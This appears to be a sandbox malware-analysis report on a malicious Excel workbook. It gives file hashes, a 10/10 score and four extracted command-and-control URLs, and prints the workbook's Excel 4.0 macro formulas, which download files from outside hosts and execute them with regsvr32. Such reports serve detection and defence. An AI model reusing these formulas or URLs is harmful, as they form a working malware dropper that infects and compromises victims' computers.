General

  • Target

    Untitled 81764.xlsm

  • Size

    228KB

  • MD5

    0be38d7e3fe5fc3a79a597ed1d254a50

  • SHA1

    f4eb84f6b1297f57e57780aa7fcabe6438880d40

  • SHA256

    da644b867f32f4c76681fd2a7838d843f447f06f87a5ea98786031f0caf169cc

  • SHA512

    e589d28f3394e198fd8cebf453952973c6967922b171d4f997499d78dd297ee62567418ce621b84848aa1d9d7e4258bd12b287de198a456b70450775b94f81b2

  • SSDEEP

    6144:9w2WMrfxxjhBMMrxBRXZ5Dz3M1qa8L4cyO:9w2LDHf9PH5XUqRLTyO

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

httph.com/nutabalong/CfyFMHWntM3t/

https://amorecuidados.com.br/wp-admin/baPRbSWvbBq/

http://bet-invest.com/mail/nui/

https://www.manchesterot.co.uk/about-us/KEfGo/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"httph.com/nutabalong/CfyFMHWntM3t/","..\oxnv1.ooccxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv1.ooccxx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://amorecuidados.com.br/wp-admin/baPRbSWvbBq/","..\oxnv2.ooccxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv2.ooccxx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bet-invest.com/mail/nui/","..\oxnv3.ooccxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv3.ooccxx")
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://www.manchesterot.co.uk/about-us/KEfGo/","..\oxnv4.ooccxx",0,0)
    =EXEC("C:\Windows\System32\regsvr32.exe /S ..\oxnv4.ooccxx")
    =RETURN()

Signatures

  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

Files

  • Untitled 81764.xlsm
    .xlsm office2007